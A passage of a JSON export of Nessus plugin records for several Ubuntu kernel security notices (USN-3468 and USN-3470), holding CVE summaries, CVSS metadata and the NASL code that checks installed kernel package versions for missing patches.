get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3468-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.10.0-1008-gcp\", pkgver:\"4.10.0-1008.8\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.10.0.1008.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.10-gcp / linux-image-gcp\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T07:33:32", "description": "USN-3468-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 17.04 for Ubuntu 16.04 LTS.\n\nIt was discovered that the KVM subsystem in the Linux kernel did not\nproperly bound guest IRQs. A local attacker in a guest VM could use\nthis to cause a denial of service (host system crash).\n(CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 16.04 LTS : linux-hwe vulnerabilities (USN-3468-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae"], "id": "UBUNTU_USN-3468-2.NASL", "href": "https://www.tenable.com/plugins/nessus/104318", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3468-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104318);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_xref(name:\"USN\", value:\"3468-2\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-hwe vulnerabilities (USN-3468-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3468-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 17.04 for Ubuntu 16.04 LTS.\n\nIt was discovered that the KVM subsystem in the Linux kernel did not\nproperly bound guest IRQs. A local attacker in a guest VM could use\nthis to cause a denial of service (host system crash).\n(CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3468-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3468-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.10.0-38-generic\", pkgver:\"4.10.0-38.42~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.10.0-38-generic-lpae\", pkgver:\"4.10.0-38.42~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.10.0-38-lowlatency\", pkgver:\"4.10.0-38.42~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.10.0.38.40\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.10.0.38.40\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.10.0.38.40\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.10-generic / linux-image-4.10-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T07:33:32", "description": "It was discovered that the KVM subsystem in the Linux kernel did not\nproperly bound guest IRQs. A local attacker in a guest VM could use\nthis to cause a denial of service (host system crash).\n(CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3468-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "cpe:/o:canonical:ubuntu_linux:17.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3468-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3468-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104317);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_xref(name:\"USN\", value:\"3468-1\");\n\n script_name(english:\"Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3468-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the KVM subsystem in the Linux kernel did not\nproperly bound guest IRQs. A local attacker in a guest VM could use\nthis to cause a denial of service (host system crash).\n(CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3468-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3468-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-1020-raspi2\", pkgver:\"4.10.0-1020.23\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-38-generic\", pkgver:\"4.10.0-38.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-38-generic-lpae\", pkgver:\"4.10.0-38.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-38-lowlatency\", pkgver:\"4.10.0-38.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic\", pkgver:\"4.10.0.38.38\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.10.0.38.38\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.10.0.38.38\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.10.0.1020.21\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.10-generic / linux-image-4.10-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T07:33:32", "description": "Qian Zhang discovered a heap-based buffer overflow in the\ntipc_msg_build() function in the Linux kernel. A local attacker could\nuse to cause a denial of service (system crash) or possibly execute\narbitrary code with administrative privileges. (CVE-2016-8632)\n\nDmitry Vyukov discovered that a race condition existed in the timerfd\nsubsystem of the Linux kernel when handling might_cancel queuing. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-10661)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10662, CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3470-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2016-8632", "CVE-2017-10661", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663", "CVE-2017-10662"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3470-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104322", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3470-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104322);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-8632\", \"CVE-2017-10661\", \"CVE-2017-10662\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_xref(name:\"USN\", value:\"3470-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3470-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Qian Zhang discovered a heap-based buffer overflow in the\ntipc_msg_build() function in the Linux kernel. A local attacker could\nuse to cause a denial of service (system crash) or possibly execute\narbitrary code with administrative privileges. (CVE-2016-8632)\n\nDmitry Vyukov discovered that a race condition existed in the timerfd\nsubsystem of the Linux kernel when handling might_cancel queuing. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-10661)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10662, CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3470-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 